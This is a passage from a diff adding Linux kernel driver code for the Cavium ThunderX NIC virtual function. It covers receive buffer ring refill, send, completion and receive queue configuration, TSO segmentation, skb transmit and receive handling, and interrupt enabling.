NIC_QSET_RBDR_0_1_STATUS0, rbdr_idx); + qcount &= 0x7FFFF; + /* Doorbell can be ringed with a max of ring size minus 1 */ + if (qcount >= (qs->rbdr_len - 1)) + goto next_rbdr; + else + refill_rb_cnt = qs->rbdr_len - qcount - 1; + + /* Start filling descs from tail */ + tail = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_TAIL, rbdr_idx) >> 3; + while (refill_rb_cnt) { + tail++; + tail &= (rbdr->dmem.q_len - 1); + + if (nicvf_alloc_rcv_buffer(nic, gfp, RCV_FRAG_LEN, &rbuf)) + break; + + desc = GET_RBDR_DESC(rbdr, tail); + desc->buf_addr = virt_to_phys(rbuf) >> NICVF_RCV_BUF_ALIGN; + refill_rb_cnt--; + new_rb++; + } + + /* make sure all memory stores are done before ringing doorbell */ + smp_wmb(); + + /* Check if buffer allocation failed */ + if (refill_rb_cnt) + nic->rb_alloc_fail = true; + else + nic->rb_alloc_fail = false; + + /* Notify HW */ + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_DOOR, + rbdr_idx, new_rb); +next_rbdr: + /* Re-enable RBDR interrupts only if buffer allocation is success */ + if (!nic->rb_alloc_fail && rbdr->enable) + nicvf_enable_intr(nic, NICVF_INTR_RBDR, rbdr_idx); + + if (rbdr_idx) + goto refill; +} + +/* Alloc rcv buffers in non-atomic mode for better success */ +void nicvf_rbdr_work(struct work_struct *work) +{ + struct nicvf *nic = container_of(work, struct nicvf, rbdr_work.work); + + nicvf_refill_rbdr(nic, GFP_KERNEL); + if (nic->rb_alloc_fail) + schedule_delayed_work(&nic->rbdr_work, msecs_to_jiffies(10)); + else + nic->rb_work_scheduled = false; +} + +/* In Softirq context, alloc rcv buffers in atomic mode */ +void nicvf_rbdr_task(unsigned long data) +{ + struct nicvf *nic = (struct nicvf *)data; + + nicvf_refill_rbdr(nic, GFP_ATOMIC); + if (nic->rb_alloc_fail) { + nic->rb_work_scheduled = true; + schedule_delayed_work(&nic->rbdr_work, msecs_to_jiffies(10)); + } +} + +/* Initialize completion queue */ +static int nicvf_init_cmp_queue(struct nicvf *nic, + struct cmp_queue *cq, int q_len) +{ + int err; + + err = nicvf_alloc_q_desc_mem(nic, &cq->dmem, q_len, CMP_QUEUE_DESC_SIZE, + NICVF_CQ_BASE_ALIGN_BYTES); + if (err) + return err; + + cq->desc = cq->dmem.base; + cq->thresh = CMP_QUEUE_CQE_THRESH; + nic->cq_coalesce_usecs = (CMP_QUEUE_TIMER_THRESH * 0.05) - 1; + + return 0; +} + +static void nicvf_free_cmp_queue(struct nicvf *nic, struct cmp_queue *cq) +{ + if (!cq) + return; + if (!cq->dmem.base) + return; + + nicvf_free_q_desc_mem(nic, &cq->dmem); +} + +/* Initialize transmit queue */ +static int nicvf_init_snd_queue(struct nicvf *nic, + struct snd_queue *sq, int q_len) +{ + int err; + + err = nicvf_alloc_q_desc_mem(nic, &sq->dmem, q_len, SND_QUEUE_DESC_SIZE, + NICVF_SQ_BASE_ALIGN_BYTES); + if (err) + return err; + + sq->desc = sq->dmem.base; + sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_ATOMIC); + sq->head = 0; + sq->tail = 0; + atomic_set(&sq->free_cnt, q_len - 1); + sq->thresh = SND_QUEUE_THRESH; + + /* Preallocate memory for TSO segment's header */ + sq->tso_hdrs = dma_alloc_coherent(&nic->pdev->dev, + q_len * TSO_HEADER_SIZE, + &sq->tso_hdrs_phys, GFP_KERNEL); + if (!sq->tso_hdrs) + return -ENOMEM; + + return 0; +} + +static void nicvf_free_snd_queue(struct nicvf *nic, struct snd_queue *sq) +{ + if (!sq) + return; + if (!sq->dmem.base) + return; + + if (sq->tso_hdrs) + dma_free_coherent(&nic->pdev->dev, sq->dmem.q_len, + sq->tso_hdrs, sq->tso_hdrs_phys); + + kfree(sq->skbuff); + nicvf_free_q_desc_mem(nic, &sq->dmem); +} + +static void nicvf_reclaim_snd_queue(struct nicvf *nic, + struct queue_set *qs, int qidx) +{ + /* Disable send queue */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, 0); + /* Check if SQ is stopped */ + if (nicvf_poll_reg(nic, qidx, NIC_QSET_SQ_0_7_STATUS, 21, 1, 0x01)) + return; + /* Reset send queue */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, NICVF_SQ_RESET); +} + +static void nicvf_reclaim_rcv_queue(struct nicvf *nic, + struct queue_set *qs, int qidx) +{ + union nic_mbx mbx = {}; + + /* Make sure all packets in the pipeline are written back into mem */ + mbx.msg.msg = NIC_MBOX_MSG_RQ_SW_SYNC; + nicvf_send_msg_to_pf(nic, &mbx); +} + +static void nicvf_reclaim_cmp_queue(struct nicvf *nic, + struct queue_set *qs, int qidx) +{ + /* Disable timer threshold (doesn't get reset upon CQ reset */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG2, qidx, 0); + /* Disable completion queue */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG, qidx, 0); + /* Reset completion queue */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG, qidx, NICVF_CQ_RESET); +} + +static void nicvf_reclaim_rbdr(struct nicvf *nic, + struct rbdr *rbdr, int qidx) +{ + u64 tmp, fifo_state; + int timeout = 10; + + /* Save head and tail pointers for feeing up buffers */ + rbdr->head = nicvf_queue_reg_read(nic, + NIC_QSET_RBDR_0_1_HEAD, + qidx) >> 3; + rbdr->tail = nicvf_queue_reg_read(nic, + NIC_QSET_RBDR_0_1_TAIL, + qidx) >> 3; + + /* If RBDR FIFO is in 'FAIL' state then do a reset first + * before relaiming. + */ + fifo_state = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_STATUS0, qidx); + if (((fifo_state >> 62) & 0x03) == 0x3) + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, + qidx, NICVF_RBDR_RESET); + + /* Disable RBDR */ + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, qidx, 0); + if (nicvf_poll_reg(nic, qidx, NIC_QSET_RBDR_0_1_STATUS0, 62, 2, 0x00)) + return; + while (1) { + tmp = nicvf_queue_reg_read(nic, + NIC_QSET_RBDR_0_1_PREFETCH_STATUS, + qidx); + if ((tmp & 0xFFFFFFFF) == ((tmp >> 32) & 0xFFFFFFFF)) + break; + usleep_range(1000, 2000); + timeout--; + if (!timeout) { + netdev_err(nic->netdev, + "Failed polling on prefetch status\n"); + return; + } + } + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, + qidx, NICVF_RBDR_RESET); + + if (nicvf_poll_reg(nic, qidx, NIC_QSET_RBDR_0_1_STATUS0, 62, 2, 0x02)) + return; + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, qidx, 0x00); + if (nicvf_poll_reg(nic, qidx, NIC_QSET_RBDR_0_1_STATUS0, 62, 2, 0x00)) + return; +} + +/* Configures receive queue */ +static void nicvf_rcv_queue_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable) +{ + union nic_mbx mbx = {}; + struct rcv_queue *rq; + struct rq_cfg rq_cfg; + + rq = &qs->rq[qidx]; + rq->enable = enable; + + /* Disable receive queue */ + nicvf_queue_reg_write(nic, NIC_QSET_RQ_0_7_CFG, qidx, 0); + + if (!rq->enable) { + nicvf_reclaim_rcv_queue(nic, qs, qidx); + return; + } + + rq->cq_qs = qs->vnic_id; + rq->cq_idx = qidx; + rq->start_rbdr_qs = qs->vnic_id; + rq->start_qs_rbdr_idx = qs->rbdr_cnt - 1; + rq->cont_rbdr_qs = qs->vnic_id; + rq->cont_qs_rbdr_idx = qs->rbdr_cnt - 1; + /* all writes of RBDR data to be loaded into L2 Cache as well*/ + rq->caching = 1; + + /* Send a mailbox msg to PF to config RQ */ + mbx.rq.msg = NIC_MBOX_MSG_RQ_CFG; + mbx.rq.qs_num = qs->vnic_id; + mbx.rq.rq_num = qidx; + mbx.rq.cfg = (rq->caching << 26) | (rq->cq_qs << 19) | + (rq->cq_idx << 16) | (rq->cont_rbdr_qs << 9) | + (rq->cont_qs_rbdr_idx << 8) | + (rq->start_rbdr_qs << 1) | (rq->start_qs_rbdr_idx); + nicvf_send_msg_to_pf(nic, &mbx); + + mbx.rq.msg = NIC_MBOX_MSG_RQ_BP_CFG; + mbx.rq.cfg = (1ULL << 63) | (1ULL << 62) | (qs->vnic_id << 0); + nicvf_send_msg_to_pf(nic, &mbx); + + /* RQ drop config + * Enable CQ drop to reserve sufficient CQEs for all tx packets + */ + mbx.rq.msg = NIC_MBOX_MSG_RQ_DROP_CFG; + mbx.rq.cfg = (1ULL << 62) | (RQ_CQ_DROP << 8); + nicvf_send_msg_to_pf(nic, &mbx); + + nicvf_queue_reg_write(nic, NIC_QSET_RQ_GEN_CFG, qidx, 0x00); + + /* Enable Receive queue */ + rq_cfg.ena = 1; + rq_cfg.tcp_ena = 0; + nicvf_queue_reg_write(nic, NIC_QSET_RQ_0_7_CFG, qidx, *(u64 *)&rq_cfg); +} + +/* Configures completion queue */ +void nicvf_cmp_queue_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable) +{ + struct cmp_queue *cq; + struct cq_cfg cq_cfg; + + cq = &qs->cq[qidx]; + cq->enable = enable; + + if (!cq->enable) { + nicvf_reclaim_cmp_queue(nic, qs, qidx); + return; + } + + /* Reset completion queue */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG, qidx, NICVF_CQ_RESET); + + if (!cq->enable) + return; + + spin_lock_init(&cq->lock); + /* Set completion queue base address */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_BASE, + qidx, (u64)(cq->dmem.phys_base)); + + /* Enable Completion queue */ + cq_cfg.ena = 1; + cq_cfg.reset = 0; + cq_cfg.caching = 0; + cq_cfg.qsize = CMP_QSIZE; + cq_cfg.avg_con = 0; + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG, qidx, *(u64 *)&cq_cfg); + + /* Set threshold value for interrupt generation */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_THRESH, qidx, cq->thresh); + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG2, + qidx, nic->cq_coalesce_usecs); +} + +/* Configures transmit queue */ +static void nicvf_snd_queue_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable) +{ + union nic_mbx mbx = {}; + struct snd_queue *sq; + struct sq_cfg sq_cfg; + + sq = &qs->sq[qidx]; + sq->enable = enable; + + if (!sq->enable) { + nicvf_reclaim_snd_queue(nic, qs, qidx); + return; + } + + /* Reset send queue */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, NICVF_SQ_RESET); + + sq->cq_qs = qs->vnic_id; + sq->cq_idx = qidx; + + /* Send a mailbox msg to PF to config SQ */ + mbx.sq.msg = NIC_MBOX_MSG_SQ_CFG; + mbx.sq.qs_num = qs->vnic_id; + mbx.sq.sq_num = qidx; + mbx.sq.cfg = (sq->cq_qs << 3) | sq->cq_idx; + nicvf_send_msg_to_pf(nic, &mbx); + + /* Set queue base address */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_BASE, + qidx, (u64)(sq->dmem.phys_base)); + + /* Enable send queue & set queue size */ + sq_cfg.ena = 1; + sq_cfg.reset = 0; + sq_cfg.ldwb = 0; + sq_cfg.qsize = SND_QSIZE; + sq_cfg.tstmp_bgx_intf = 0; + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, *(u64 *)&sq_cfg); + + /* Set threshold value for interrupt generation */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_THRESH, qidx, sq->thresh); + + /* Set queue:cpu affinity for better load distribution */ + if (cpu_online(qidx)) { + cpumask_set_cpu(qidx, &sq->affinity_mask); + netif_set_xps_queue(nic->netdev, + &sq->affinity_mask, qidx); + } +} + +/* Configures receive buffer descriptor ring */ +static void nicvf_rbdr_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable) +{ + struct rbdr *rbdr; + struct rbdr_cfg rbdr_cfg; + + rbdr = &qs->rbdr[qidx]; + nicvf_reclaim_rbdr(nic, rbdr, qidx); + if (!enable) + return; + + /* Set descriptor base address */ + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_BASE, + qidx, (u64)(rbdr->dmem.phys_base)); + + /* Enable RBDR & set queue size */ + /* Buffer size should be in multiples of 128 bytes */ + rbdr_cfg.ena = 1; + rbdr_cfg.reset = 0; + rbdr_cfg.ldwb = 0; + rbdr_cfg.qsize = RBDR_SIZE; + rbdr_cfg.avg_con = 0; + rbdr_cfg.lines = rbdr->dma_size / 128; + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, + qidx, *(u64 *)&rbdr_cfg); + + /* Notify HW */ + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_DOOR, + qidx, qs->rbdr_len - 1); + + /* Set threshold value for interrupt generation */ + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_THRESH, + qidx, rbdr->thresh - 1); +} + +/* Requests PF to assign and enable Qset */ +void nicvf_qset_config(struct nicvf *nic, bool enable) +{ + union nic_mbx mbx = {}; + struct queue_set *qs = nic->qs; + struct qs_cfg *qs_cfg; + + if (!qs) { + netdev_warn(nic->netdev, + "Qset is still not allocated, don't init queues\n"); + return; + } + + qs->enable = enable; + qs->vnic_id = nic->vf_id; + + /* Send a mailbox msg to PF to config Qset */ + mbx.qs.msg = NIC_MBOX_MSG_QS_CFG; + mbx.qs.num = qs->vnic_id; + + mbx.qs.cfg = 0; + qs_cfg = (struct qs_cfg *)&mbx.qs.cfg; + if (qs->enable) { + qs_cfg->ena = 1; +#ifdef __BIG_ENDIAN + qs_cfg->be = 1; +#endif + qs_cfg->vnic = qs->vnic_id; + } + nicvf_send_msg_to_pf(nic, &mbx); +} + +static void nicvf_free_resources(struct nicvf *nic) +{ + int qidx; + struct queue_set *qs = nic->qs; + + /* Free receive buffer descriptor ring */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) + nicvf_free_rbdr(nic, &qs->rbdr[qidx]); + + /* Free completion queue */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) + nicvf_free_cmp_queue(nic, &qs->cq[qidx]); + + /* Free send queue */ + for (qidx = 0; qidx < qs->sq_cnt; qidx++) + nicvf_free_snd_queue(nic, &qs->sq[qidx]); +} + +static int nicvf_alloc_resources(struct nicvf *nic) +{ + int qidx; + struct queue_set *qs = nic->qs; + + /* Alloc receive buffer descriptor ring */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) { + if (nicvf_init_rbdr(nic, &qs->rbdr[qidx], qs->rbdr_len, + DMA_BUFFER_LEN)) + goto alloc_fail; + } + + /* Alloc send queue */ + for (qidx = 0; qidx < qs->sq_cnt; qidx++) { + if (nicvf_init_snd_queue(nic, &qs->sq[qidx], qs->sq_len)) + goto alloc_fail; + } + + /* Alloc completion queue */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + if (nicvf_init_cmp_queue(nic, &qs->cq[qidx], qs->cq_len)) + goto alloc_fail; + } + + return 0; +alloc_fail: + nicvf_free_resources(nic); + return -ENOMEM; +} + +int nicvf_set_qset_resources(struct nicvf *nic) +{ + struct queue_set *qs; + + qs = devm_kzalloc(&nic->pdev->dev, sizeof(*qs), GFP_KERNEL); + if (!qs) + return -ENOMEM; + nic->qs = qs; + + /* Set count of each queue */ + qs->rbdr_cnt = RBDR_CNT; + qs->rq_cnt = RCV_QUEUE_CNT; + qs->sq_cnt = SND_QUEUE_CNT; + qs->cq_cnt = CMP_QUEUE_CNT; + + /* Set queue lengths */ + qs->rbdr_len = RCV_BUF_COUNT; + qs->sq_len = SND_QUEUE_LEN; + qs->cq_len = CMP_QUEUE_LEN; + return 0; +} + +int nicvf_config_data_transfer(struct nicvf *nic, bool enable) +{ + bool disable = false; + struct queue_set *qs = nic->qs; + int qidx; + + if (!qs) + return 0; + + if (enable) { + if (nicvf_alloc_resources(nic)) + return -ENOMEM; + + for (qidx = 0; qidx < qs->sq_cnt; qidx++) + nicvf_snd_queue_config(nic, qs, qidx, enable); + for (qidx = 0; qidx < qs->cq_cnt; qidx++) + nicvf_cmp_queue_config(nic, qs, qidx, enable); + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) + nicvf_rbdr_config(nic, qs, qidx, enable); + for (qidx = 0; qidx < qs->rq_cnt; qidx++) + nicvf_rcv_queue_config(nic, qs, qidx, enable); + } else { + for (qidx = 0; qidx < qs->rq_cnt; qidx++) + nicvf_rcv_queue_config(nic, qs, qidx, disable); + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) + nicvf_rbdr_config(nic, qs, qidx, disable); + for (qidx = 0; qidx < qs->sq_cnt; qidx++) + nicvf_snd_queue_config(nic, qs, qidx, disable); + for (qidx = 0; qidx < qs->cq_cnt; qidx++) + nicvf_cmp_queue_config(nic, qs, qidx, disable); + + nicvf_free_resources(nic); + } + + return 0; +} + +/* Get a free desc from SQ + * returns descriptor ponter & descriptor number + */ +static inline int nicvf_get_sq_desc(struct snd_queue *sq, int desc_cnt) +{ + int qentry; + + qentry = sq->tail; + atomic_sub(desc_cnt, &sq->free_cnt); + sq->tail += desc_cnt; + sq->tail &= (sq->dmem.q_len - 1); + + return qentry; +} + +/* Free descriptor back to SQ for future use */ +void nicvf_put_sq_desc(struct snd_queue *sq, int desc_cnt) +{ + atomic_add(desc_cnt, &sq->free_cnt); + sq->head += desc_cnt; + sq->head &= (sq->dmem.q_len - 1); +} + +static inline int nicvf_get_nxt_sqentry(struct snd_queue *sq, int qentry) +{ + qentry++; + qentry &= (sq->dmem.q_len - 1); + return qentry; +} + +void nicvf_sq_enable(struct nicvf *nic, struct snd_queue *sq, int qidx) +{ + u64 sq_cfg; + + sq_cfg = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_CFG, qidx); + sq_cfg |= NICVF_SQ_EN; + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, sq_cfg); + /* Ring doorbell so that H/W restarts processing SQEs */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_DOOR, qidx, 0); +} + +void nicvf_sq_disable(struct nicvf *nic, int qidx) +{ + u64 sq_cfg; + + sq_cfg = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_CFG, qidx); + sq_cfg &= ~NICVF_SQ_EN; + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, sq_cfg); +} + +void nicvf_sq_free_used_descs(struct net_device *netdev, struct snd_queue *sq, + int qidx) +{ + u64 head, tail; + struct sk_buff *skb; + struct nicvf *nic = netdev_priv(netdev); + struct sq_hdr_subdesc *hdr; + + head = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_HEAD, qidx) >> 4; + tail = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_TAIL, qidx) >> 4; + while (sq->head != head) { + hdr = (struct sq_hdr_subdesc *)GET_SQ_DESC(sq, sq->head); + if (hdr->subdesc_type != SQ_DESC_TYPE_HEADER) { + nicvf_put_sq_desc(sq, 1); + continue; + } + skb = (struct sk_buff *)sq->skbuff[sq->head]; + atomic64_add(1, (atomic64_t *)&netdev->stats.tx_packets); + atomic64_add(hdr->tot_len, + (atomic64_t *)&netdev->stats.tx_bytes); + dev_kfree_skb_any(skb); + nicvf_put_sq_desc(sq, hdr->subdesc_cnt + 1); + } +} + +/* Calculate no of SQ subdescriptors needed to transmit all + * segments of this TSO packet. + * Taken from 'Tilera network driver' with a minor modification. + */ +static int nicvf_tso_count_subdescs(struct sk_buff *skb) +{ + struct skb_shared_info *sh = skb_shinfo(skb); + unsigned int sh_len = skb_transport_offset(skb) + tcp_hdrlen(skb); + unsigned int data_len = skb->len - sh_len; + unsigned int p_len = sh->gso_size; + long f_id = -1; /* id of the current fragment */ + long f_size = skb_headlen(skb) - sh_len; /* current fragment size */ + long f_used = 0; /* bytes used from the current fragment */ + long n; /* size of the current piece of payload */ + int num_edescs = 0; + int segment; + + for (segment = 0; segment < sh->gso_segs; segment++) { + unsigned int p_used = 0; + + /* One edesc for header and for each piece of the payload. */ + for (num_edescs++; p_used < p_len; num_edescs++) { + /* Advance as needed. */ + while (f_used >= f_size) { + f_id++; + f_size = skb_frag_size(&sh->frags[f_id]); + f_used = 0; + } + + /* Use bytes from the current fragment. */ + n = p_len - p_used; + if (n > f_size - f_used) + n = f_size - f_used; + f_used += n; + p_used += n; + } + + /* The last segment may be less than gso_size. */ + data_len -= p_len; + if (data_len < p_len) + p_len = data_len; + } + + /* '+ gso_segs' for SQ_HDR_SUDESCs for each segment */ + return num_edescs + sh->gso_segs; +} + +/* Get the number of SQ descriptors needed to xmit this skb */ +static int nicvf_sq_subdesc_required(struct nicvf *nic, struct sk_buff *skb) +{ + int subdesc_cnt = MIN_SQ_DESC_PER_PKT_XMIT; + + if (skb_shinfo(skb)->gso_size) { + subdesc_cnt = nicvf_tso_count_subdescs(skb); + return subdesc_cnt; + } + + if (skb_shinfo(skb)->nr_frags) + subdesc_cnt += skb_shinfo(skb)->nr_frags; + + return subdesc_cnt; +} + +/* Add SQ HEADER subdescriptor. + * First subdescriptor for every send descriptor. + */ +static inline void +nicvf_sq_add_hdr_subdesc(struct snd_queue *sq, int qentry, + int subdesc_cnt, struct sk_buff *skb, int len) +{ + int proto; + struct sq_hdr_subdesc *hdr; + + hdr = (struct sq_hdr_subdesc *)GET_SQ_DESC(sq, qentry); + sq->skbuff[qentry] = (u64)skb; + + memset(hdr, 0, SND_QUEUE_DESC_SIZE); + hdr->subdesc_type = SQ_DESC_TYPE_HEADER; + /* Enable notification via CQE after processing SQE */ + hdr->post_cqe = 1; + /* No of subdescriptors following this */ + hdr->subdesc_cnt = subdesc_cnt; + hdr->tot_len = len; + + /* Offload checksum calculation to HW */ + if (skb->ip_summed == CHECKSUM_PARTIAL) { + if (skb->protocol != htons(ETH_P_IP)) + return; + + hdr->csum_l3 = 1; /* Enable IP csum calculation */ + hdr->l3_offset = skb_network_offset(skb); + hdr->l4_offset = skb_transport_offset(skb); + + proto = ip_hdr(skb)->protocol; + switch (proto) { + case IPPROTO_TCP: + hdr->csum_l4 = SEND_L4_CSUM_TCP; + break; + case IPPROTO_UDP: + hdr->csum_l4 = SEND_L4_CSUM_UDP; + break; + case IPPROTO_SCTP: + hdr->csum_l4 = SEND_L4_CSUM_SCTP; + break; + } + } +} + +/* SQ GATHER subdescriptor + * Must follow HDR descriptor + */ +static inline void nicvf_sq_add_gather_subdesc(struct snd_queue *sq, int qentry, + int size, u64 data) +{ + struct sq_gather_subdesc *gather; + + qentry &= (sq->dmem.q_len - 1); + gather = (struct sq_gather_subdesc *)GET_SQ_DESC(sq, qentry); + + memset(gather, 0, SND_QUEUE_DESC_SIZE); + gather->subdesc_type = SQ_DESC_TYPE_GATHER; + gather->ld_type = NIC_SEND_LD_TYPE_E_LDWB; + gather->size = size; + gather->addr = data; +} + +/* Segment a TSO packet into 'gso_size' segments and append + * them to SQ for transfer + */ +static int nicvf_sq_append_tso(struct nicvf *nic, struct snd_queue *sq, + int qentry, struct sk_buff *skb) +{ + struct tso_t tso; + int seg_subdescs = 0, desc_cnt = 0; + int seg_len, total_len, data_left; + int hdr_qentry = qentry; + int hdr_len = skb_transport_offset(skb) + tcp_hdrlen(skb); + + tso_start(skb, &tso); + total_len = skb->len - hdr_len; + while (total_len > 0) { + char *hdr; + + /* Save Qentry for adding HDR_SUBDESC at the end */ + hdr_qentry = qentry; + + data_left = min_t(int, skb_shinfo(skb)->gso_size, total_len); + total_len -= data_left; + + /* Add segment's header */ + qentry = nicvf_get_nxt_sqentry(sq, qentry); + hdr = sq->tso_hdrs + qentry * TSO_HEADER_SIZE; + tso_build_hdr(skb, hdr, &tso, data_left, total_len == 0); + nicvf_sq_add_gather_subdesc(sq, qentry, hdr_len, + sq->tso_hdrs_phys + + qentry * TSO_HEADER_SIZE); + /* HDR_SUDESC + GATHER */ + seg_subdescs = 2; + seg_len = hdr_len; + + /* Add segment's payload fragments */ + while (data_left > 0) { + int size; + + size = min_t(int, tso.size, data_left); + + qentry = nicvf_get_nxt_sqentry(sq, qentry); + nicvf_sq_add_gather_subdesc(sq, qentry, size, + virt_to_phys(tso.data)); + seg_subdescs++; + seg_len += size; + + data_left -= size; + tso_build_data(skb, &tso, size); + } + nicvf_sq_add_hdr_subdesc(sq, hdr_qentry, + seg_subdescs - 1, skb, seg_len); + sq->skbuff[hdr_qentry] = 0; + qentry = nicvf_get_nxt_sqentry(sq, qentry); + + desc_cnt += seg_subdescs; + } + /* Save SKB in the last segment for freeing */ + sq->skbuff[hdr_qentry] = (u64)skb; + + /* make sure all memory stores are done before ringing doorbell */ + smp_wmb(); + + /* Inform HW to xmit all TSO segments */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_DOOR, + skb_get_queue_mapping(skb), desc_cnt); + return 1; +} + +/* Append an skb to a SQ for packet transfer. */ +int nicvf_sq_append_skb(struct nicvf *nic, struct sk_buff *skb) +{ + int i, size; + int subdesc_cnt; + int sq_num, qentry; + struct queue_set *qs = nic->qs; + struct snd_queue *sq; + + sq_num = skb_get_queue_mapping(skb); + sq = &qs->sq[sq_num]; + + subdesc_cnt = nicvf_sq_subdesc_required(nic, skb); + if (subdesc_cnt > atomic_read(&sq->free_cnt)) + goto append_fail; + + qentry = nicvf_get_sq_desc(sq, subdesc_cnt); + + /* Check if its a TSO packet */ + if (skb_shinfo(skb)->gso_size) + return nicvf_sq_append_tso(nic, sq, qentry, skb); + + /* Add SQ header subdesc */ + nicvf_sq_add_hdr_subdesc(sq, qentry, subdesc_cnt - 1, skb, skb->len); + + /* Add SQ gather subdescs */ + qentry = nicvf_get_nxt_sqentry(sq, qentry); + size = skb_is_nonlinear(skb) ? skb_headlen(skb) : skb->len; + nicvf_sq_add_gather_subdesc(sq, qentry, size, virt_to_phys(skb->data)); + + /* Check for scattered buffer */ + if (!skb_is_nonlinear(skb)) + goto doorbell; + + for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) { + const struct skb_frag_struct *frag; + + frag = &skb_shinfo(skb)->frags[i]; + + qentry = nicvf_get_nxt_sqentry(sq, qentry); + size = skb_frag_size(frag); + nicvf_sq_add_gather_subdesc(sq, qentry, size, + virt_to_phys( + skb_frag_address(frag))); + } + +doorbell: + /* make sure all memory stores are done before ringing doorbell */ + smp_wmb(); + + /* Inform HW to xmit new packet */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_DOOR, + sq_num, subdesc_cnt); + return 1; + +append_fail: + netdev_dbg(nic->netdev, "Not enough SQ descriptors to xmit pkt\n"); + return 0; +} + +static inline unsigned frag_num(unsigned i) +{ +#ifdef __BIG_ENDIAN + return (i & ~3) + 3 - (i & 3); +#else + return i; +#endif +} + +/* Returns SKB for a received packet */ +struct sk_buff *nicvf_get_rcv_skb(struct nicvf *nic, struct cqe_rx_t *cqe_rx) +{ + int frag; + int payload_len = 0; + struct sk_buff *skb = NULL; + struct sk_buff *skb_frag = NULL; + struct sk_buff *prev_frag = NULL; + u16 *rb_lens = NULL; + u64 *rb_ptrs = NULL; + + rb_lens = (void *)cqe_rx + (3 * sizeof(u64)); + rb_ptrs = (void *)cqe_rx + (6 * sizeof(u64)); + + netdev_dbg(nic->netdev, "%s rb_cnt %d rb0_ptr %llx rb0_sz %d\n", + __func__, cqe_rx->rb_cnt, cqe_rx->rb0_ptr, cqe_rx->rb0_sz); + + for (frag = 0; frag < cqe_rx->rb_cnt; frag++) { + payload_len = rb_lens[frag_num(frag)]; + if (!frag) { + /* First fragment */ + skb = nicvf_rb_ptr_to_skb(nic, + *rb_ptrs - cqe_rx->align_pad, + payload_len); + if (!skb) + return NULL; + skb_reserve(skb, cqe_rx->align_pad); + skb_put(skb, payload_len); + } else { + /* Add fragments */ + skb_frag = nicvf_rb_ptr_to_skb(nic, *rb_ptrs, + payload_len); + if (!skb_frag) { + dev_kfree_skb(skb); + return NULL; + } + + if (!skb_shinfo(skb)->frag_list) + skb_shinfo(skb)->frag_list = skb_frag; + else + prev_frag->next = skb_frag; + + prev_frag = skb_frag; + skb->len += payload_len; + skb->data_len += payload_len; + skb_frag->len = payload_len; + } + /* Next buffer pointer */ + rb_ptrs++; + } + return skb; +} + +/* Enable interrupt */ +void nicvf_enable_intr(struct nicvf *nic, int int_type, int q_idx) +{ + u64 reg_val; + + reg_val = nicvf_reg_read(nic, NIC_VF_ENA_W1S); + + switch (int_type) { + case NICVF_INTR_CQ: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_CQ_SHIFT); + break; + case NICVF_INTR_SQ: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_SQ_SHIFT); + break; + case NICVF_INTR_RBDR: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_RBDR_SHIFT); + break; + case NICVF_INTR_PKT_DROP: + reg_val |= (1ULL << NICVF_INTR_PKT_DROP_SHIFT); + break; + case NICVF_INTR_TCP_TIMER: + reg_val |= (1ULL << NICVF_INTR_TCP_TIMER_SHIFT); + break; + case NICVF_INTR_MBOX: + reg_val |= (1ULL << NICVF_INTR_MBOX_SHIFT); + break; + case NICVF_INTR_QS_ERR: + reg_val |= (1ULL << NICVF_INTR_QS_ERR_SHIFT); + break; + default: + netdev_err(nic->netdev, + "Failed to enable interrupt: unknown type\n"); + break; + } + + nicvf_reg_write(nic, NIC_VF_ENA_W1S, reg_val); +} + +/* Disable interrupt */ +void nicvf_disable_intr(struct nicvf *nic, int int_type, int q_idx) +{ + u64 reg_val = 0; + + switch (int_type) { + case 